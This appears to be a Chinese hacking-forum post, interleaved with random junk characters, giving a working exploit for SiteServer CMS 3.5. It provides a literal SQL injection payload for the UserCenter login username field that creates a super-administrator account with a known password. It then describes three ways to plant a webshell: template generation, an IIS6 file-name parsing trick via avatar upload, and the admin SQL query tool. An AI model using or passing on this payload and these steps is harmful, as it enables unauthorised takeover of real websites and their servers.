经测试秒杀最新的3.5版
1 |" p1 C2 _, W+ t% n- Z3 J1 J; `7 H3 o2 N" M* U
stieserver官网:www.siteserver.cn
' c" L+ u3 Y6 ~& T! d7 K* _
& a% Z$ ~1 Y" N u 1 T- h4 ^' t6 s% g- h
6 l; n" V( D) D! ZEXP:2 K# d& r/ p, c. w F
# o. i4 G7 V; J G直接访问UserCenter/login.aspx
; h! d& X! a+ Y$ H/ @, H6 w& v; f: l3 h& i
" U5 x# V6 h7 u! [$ \) A6 I
5 b6 L' q. B6 I. h
用户名处输入:
7 t& ]# v0 y2 Z. E0 P6 R. Y& f& d8 u) @* L+ i1 W
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
; M4 g8 ^3 Z; e/ \2 o5 N6 H5 ]
, P2 a7 K7 f$ ], t8 I& I0 W 2 f3 R6 ~& P, k4 r# {. m0 [
$ a8 ^+ m, {* x/ Z! ^! z& F
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。# H$ U% c9 x; ?$ J. V
! G" }/ ^5 O0 a& Z$ q7 l% J; \ : X6 l2 E! x0 D2 V
# O. l6 T r. }+ B
之后再访问后台SiteServer/login.aspx用插入的用户登陆- l3 J0 V, l+ _% E+ T
" F; F' j' h. K4 A( i: n1 j, ?" y 9 Z; l9 O! v& j3 j
, x) l% ^5 F$ O9 [3 B0 Y后台拿webshell的三种方法: F* c0 I* y2 Q k' _! M
X. d4 ]9 z; ]3 f2 y
一、- U3 Z6 D2 G) i/ C
( H) L$ [! c# L站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx3 D0 j+ i) Q: m( W2 d
; A% _! ^; H2 B, H* k, P二、
- ~$ K0 T* a; P; ]( c9 |8 j
- j; n3 a( D; x3 Q) _+ p9 V7 _成员权限-》添加用户-》用户名为:1.asp
* k- F1 I, o1 D1 D h7 [1 Q& H
% `8 d0 c$ w) O& b, \( j9 l' Phttp://127.0.0.1/usercenter/" M2 }' S* s3 O
0 f0 i+ i! R* `1 A% e, M# f- o4 i, ?用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell# J; m( _ Z5 D3 B/ W8 A
3 L6 b5 h4 {1 x" r8 T5 n
(ps:后台添加用户时不会验证是否含有非法字符)2 D3 o1 g9 P" G! T3 I% U+ z
/ [ p* L6 K& \* i+ G三、
* v" H* l" G2 i% J
! D0 c: |9 H% G$ Z1 @系统工具-》实用工具-》机器参数查看; ~4 S' I# K7 d2 g: K& x* ?* K
可以看到数据库类型、名称,WEB路径! Q. K, }4 q# Q. g: Q" }9 n
$ [ V ?, \9 l5 L( a* j7 Z系统工具-》数据库工具-》SQL语句查询
( Z. A: M0 y0 g2 j* D这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。9 |. t4 F" Y% b7 |% ~7 |4 |. Q, ?" u
- G B, h! L5 y( p( b0 G |